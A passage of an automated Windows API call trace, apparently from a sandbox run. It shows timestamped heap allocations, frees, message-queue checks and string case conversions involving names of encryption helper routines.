lpMsg=0x87f36c) returned 0 [0164.731] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0164.731] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0164.731] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0164.731] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0164.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0164.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0164.731] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0164.731] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26b8 [0164.731] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0164.731] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0164.731] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0164.731] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0164.731] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xefde) returned 0x9e5190 [0164.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0164.731] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2668 [0164.731] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0164.731] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0164.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0164.731] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c28e8 [0164.731] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0164.732] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0164.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0164.732] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2768 [0164.732] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0164.732] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0164.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0164.732] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd390 [0164.732] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0164.732] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0164.732] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0164.732] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0164.732] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0164.732] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xefde) returned 0xa03160 [0164.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0164.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0164.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0164.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0164.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0164.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0164.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0164.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0164.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0164.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0164.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0164.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0164.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0164.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0164.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0164.733] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0164.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0164.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0164.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0164.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0164.734] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0164.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0164.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0164.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0164.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0164.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0164.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0164.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0164.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0164.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0164.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0164.734] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0164.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0164.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0164.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0164.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2728 [0164.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0164.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0164.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0164.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0164.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd7e0 [0164.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0164.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0164.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0164.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0164.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0164.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0164.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0164.735] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0164.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0164.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0164.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0164.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0164.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0164.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0164.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0164.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0164.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0164.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0164.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0164.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0164.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0164.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0164.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0164.735] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0164.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0164.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0164.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0164.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0164.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0164.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0164.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0164.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0164.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0164.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0164.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0164.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0164.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0164.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0164.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0164.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0164.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0164.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0164.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0164.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0164.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0164.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0164.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0164.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0164.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0164.736] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0164.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0164.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0164.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0164.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0164.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0164.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0164.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0164.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0164.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0164.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0164.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0164.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0164.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0164.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0164.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0164.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0164.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0164.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0164.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0164.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0164.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0164.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0164.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0164.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0164.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0164.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0164.737] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0164.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0164.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0164.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0164.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0164.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0164.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0164.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0164.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0164.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0164.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0164.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0164.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0164.738] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0164.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0164.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0164.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd420 [0164.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0164.738] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0164.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0164.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0164.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0164.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0164.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0164.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0164.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0164.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0164.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0164.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0164.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0164.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0164.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0164.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0164.739] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0164.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0164.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0164.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0164.739] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0164.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0164.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0164.739] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0164.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0164.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0164.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0164.739] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0164.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0164.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0164.739] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0164.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0164.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0164.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0164.739] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0164.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0164.739] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0164.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0164.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0164.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0164.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0164.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0164.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0164.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0164.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0164.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0164.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0164.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0164.740] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0164.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0164.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0164.740] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0164.740] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0164.740] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0164.740] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0164.740] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0164.740] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0164.740] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0164.740] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0164.740] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0164.740] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0164.740] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0164.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0164.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0164.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0164.740] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0164.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0164.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0164.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0164.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0164.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0164.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0164.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0164.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0164.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0164.741] 